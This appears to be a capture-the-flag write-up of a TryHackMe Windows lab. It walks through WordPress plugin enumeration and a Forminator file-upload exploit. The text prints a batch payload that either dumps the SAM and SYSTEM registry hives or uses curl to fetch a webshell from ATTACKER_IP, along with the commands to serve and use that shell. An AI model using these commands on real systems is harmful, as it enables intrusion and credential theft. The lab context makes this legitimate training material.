As we can see, there is just too many ports open, but our taget is the web port!, I am gonna try to make this writeup as short as possible.
Visiting the default port 80, we get this page!
Now visiting the dashboard we can only get the phpinfo page from there, but it's not much of a help, so we can try to get the gift endpoint.
It does not load at first instance! gives of an error that its unable to load the page, however look at the url tab.
Now edit your host file so that you can access the site, for example edit your host file as the following
/etc/hosts
target_ipavenger.tryhackme
Now you should be able to access the site. It will take some time to load, since it's a windows machine.
Once loaded, it gives us a wordpress powered site. Use wpscan for enumerating vulnerabilites in the wordpress!
wpscan - plugin enumeration
[+] forminator
| Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
| Last Updated: 2023-11-13T09:11:00.000Z
| [!] The version is out of date, the latest version is 1.28.0
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.24.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
A simple googling will lead us to the following exploit against forminator
As per the notes in expoit db, we can upload any kind of file on the server, lets try something, use the following training request form to upload your batch file, since we are targeting windows, and it is already mentioned that Antivirus is enabled, we need to be carefull about it.
So we will not be using any reverse shell for this case, but rather a simple webshell, best webshell is powny shell
Download the shell.php in your current directory, and prepare your setup.
I have already enumerated the forminator plugin, and I could not find any valid endpoint where the file gets stored, so don't worry about a reverse shell. Since the backend process will check each message carefully we can expect this attack vector as a simple phishing attack, where we upload a malacious file and it gets executed.
Weaponization
Since we know that the target server is likely using xampp, we can think of its absolute default path as the following:
Default xampp server path
C:\xampp\htdocs
Now we will craft a simple batch file which will check if the user/process that will execute our program is running as "nt /authourity" or not, if its not then download a webshell in htdocs directory, else get the SAM files. Do change the ATTACKER_IP in the script, modify it as per your needs.
getsam.bat
@echooff:: Check if the current user is NT AUTHORITY\SYSTEMwhoami /groups |find"S-1-5-18">nulif %errorlevel% equ0 (:: Run commands for NT AUTHORITY\SYSTEM reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bak reg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak) else (:: Run commands for other users curl http://ATTACKER_IP/powny.php -o C:\xampp\htdocs\shell.php)
Delivery
Now start the python server in your directory.
Start the server
python-mhttp.server80.
Upload the batch file!
Look for the web request in your python server.
And you have your shell on the server!
Exploitation
VIsit the shell.php, and you will have a powny shell ready for you.
As you can see, if we type whoami, we are admin!
That means we can do whatever we want, like disabling Anti-Virus as well, but we dont need to that. Just get the SAM files, and we will get the admin hashes, later use them to gain access to the system.
use these commands
reg.exe save HKLM\SYSTEM C:\xampp\htdocs\system.bakreg.exe save HKLM\SAM C:\xampp\htdocs\sam.bak
Now check the root directory, it should have those registry backups
